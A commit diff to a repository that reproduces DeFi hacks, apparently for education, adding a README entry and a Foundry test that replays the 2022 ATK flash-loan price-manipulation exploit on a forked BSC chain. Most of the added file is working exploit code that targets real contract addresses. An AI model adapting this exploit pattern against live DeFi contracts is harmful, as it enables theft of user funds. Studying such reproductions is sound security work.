Merge pull request SunWeb3Sec#73 from zhouxianyuan/main

ATK_exp

README.md

@@ -1,7 +1,7 @@
 # DeFi Hacks Reproduce - Foundry
 **Reproduce DeFi hack incidents using Foundry.**
 
-95 incidents included.
+96 incidents included.
 
 This repo is only for the educational purpose.
 
@@ -15,6 +15,8 @@ Let's make Web3 secure! Join [Discord](https://discord.gg/Fjyngakf3h)
 
 ## List of DeFi Hacks & Exploits
 
+[20221012 ATK](#20221012-atk---flashloan-manipulate-price)
+
 [20221011 Templedao](#20221011-templedao---insufficient-access-control)
 
 [20221010 Carrot](#20221010-carrot---public-functioncall)
@@ -212,6 +214,21 @@ Let's make Web3 secure! Join [Discord](https://discord.gg/Fjyngakf3h)
 ### Useful tools
 [ABI to interface](https://gnidan.github.io/abi-to-sol/) | [Get ABI for unverified contracts](https://abi.w1nt3r.xyz/) | [ETH Calldata Decoder](https://apoorvlathey.com/eth-calldata-decoder/)
 
+### 20221012 ATK - FlashLoan manipulate price
+### Lost: $127 k
+Testing
+```sh
+forge test --contracts ./src/test/ATK_exp.sol -vvv
+```
+
+### Contract 
+
+[ATK_exp.sol](src/test/ATK_exp.sol)
+
+#### Link reference
+
+https://twitter.com/BlockSecTeam/status/1580095325200474112
+
 ### 20221011 Templedao - Insufficient access control 
 ### Lost: $2.3 million
 Testing

src/test/ATK_exp.sol

@@ -0,0 +1,69 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.10;
+
+import "forge-std/Test.sol";
+import "./interface.sol";
+
+// @Analysis
+// https://twitter.com/BlockSecTeam/status/1580095325200474112
+// @Contract address
+// https://bscscan.com/tx/0x9e328f77809ea3c01833ec7ed8928edb4f5798c96f302b54fc640a22b3dd1a52 attack
+// https://bscscan.com/tx/0x55983d8701e40353fee90803688170a16424ee702f6b21bb198bb8e7282112cd attack
+// https://bscscan.com/tx/0x601b8ab0c1d51e71796a0df5453ca671ae23de3d5ec9ffd87b9c378504f99c32 profit
+
+// closed-source Contract is design to deposit and claimReward , the calim Function use getPrice() in ASK Token Contract
+// root cause: getPrice() function
+
+contract ContractTest is DSTest{
+
+    IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
+    IERC20 ATK = IERC20(0x9cB928Bf50ED220aC8f703bce35BE5ce7F56C99c);
+    IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
+    Uni_Router_V2 Router = Uni_Router_V2(0x10ED43C718714eb63d5aA57B78B54704E256024E);
+    Uni_Pair_V2 Pair = Uni_Pair_V2(0xd228fAee4f73a73fcC73B6d9a1BD25EE1D6ee611);
+    uint swapamount;
+
+    CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
+
+    function setUp() public {
+        cheats.createSelectFork("bsc", 22102838);
+    }
+
+    function testExploit() public{
+
+        address(WBNB).call{value: 2 ether}("");
+        WBNBToUSDT();
+        swapamount = USDT.balanceOf(address(Pair)) - 3 * 1e18;
+        Pair.swap(swapamount, 0, address(this), new bytes(1));
+        emit log_named_decimal_uint(
+            "[End] Attacker ATK balance after exploit",
+            ATK.balanceOf(address(0xD7ba198ce82f4c46AD8F6148CCFDB41866750231)),
+            18
+        );
+    }
+
+
+    function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
+        // call claimToken1 function
+        cheats.startPrank(0xD7ba198ce82f4c46AD8F6148CCFDB41866750231);
+        address(0x96bF2E6CC029363B57Ffa5984b943f825D333614).call(abi.encode(bytes4(0x8a809095)));
+        cheats.stopPrank();
+        USDT.transfer(address(Pair), swapamount * 10000 / 9975 + 1000);
+    }
+
+    function WBNBToUSDT() internal {
+        WBNB.approve(address(Router), type(uint).max);
+        address [] memory path = new address[](2);
+        path[0] = address(WBNB);
+        path[1] = address(USDT);
+        Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
+            WBNB.balanceOf(address(this)),
+            0,
+            path,
+            address(this),
+            block.timestamp
+        );
+    }
+
+
+}